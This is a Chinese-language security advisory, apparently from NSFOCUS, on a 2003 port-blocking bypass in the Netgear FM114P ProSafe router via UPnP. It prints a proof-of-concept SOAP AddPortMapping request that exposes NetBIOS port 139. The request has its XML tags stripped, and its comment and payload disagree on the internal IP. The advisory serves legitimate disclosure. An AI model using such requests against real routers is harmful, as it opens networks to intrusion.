安全研究
安全漏洞
Netgear FM114P ProSafe无线路由器规则可绕过漏洞
发布日期:2003-04-03
更新日期:2003-04-08
受影响系统:Netgear FM114P
描述:
BUGTRAQ ID:
7270
Netgear FM114P ProSafe是一款无线网络路由器。
Netgear FM114P ProSafe无线网络路由器在使用UPnP功能时其端口阻挡规则漏洞,远程攻击者可以利用这个漏洞绕过规则访问受限端口。
Netgear FM114P允许对部分端口进行阻挡,可限制外部用户访问内部网络或限制内部用户连接WAN,如果设备中远程访问和UPnP功能开启的情况下,远程用户可以提交UPnP SOAP请求连接绕过规则访问受限制端口,
<*来源:Bj?rn Stickler (
stickler@rbg.informatik.tu-darmstadt.de)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=104940758020372&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Bj?rn Stickler (
stickler@rbg.informatik.tu-darmstadt.de)提供了如下测试方法:
--- sample for passing port 139 (netbios) from internal ip 192.168.0.2: ---
POST /upnp/service/WANPPPConnection HTTP/1.1
Content-Type: text/xml; charset="utf-8"
SOAPAction: "urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"
User-Agent: Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
Host: 192.168.0.1
Content-Length: 1123
Connection: Keep-Alive
Pragma: no-cache
139
TCP
139
192.168.0.6
1
NetBios
0
建议:
厂商补丁:
Netgear
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.netgear.com/浏览次数:3164
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |